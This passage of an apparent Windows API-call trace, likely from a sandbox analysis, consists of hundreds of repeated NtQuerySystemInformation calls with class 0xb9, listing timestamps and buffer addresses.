(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f380, Length=0x38, ResultLength=0x0) [0209.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f380, Length=0x38, ResultLength=0x0) [0209.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f380, Length=0x38, ResultLength=0x0) [0209.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f460, Length=0x40, ResultLength=0x0) [0209.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 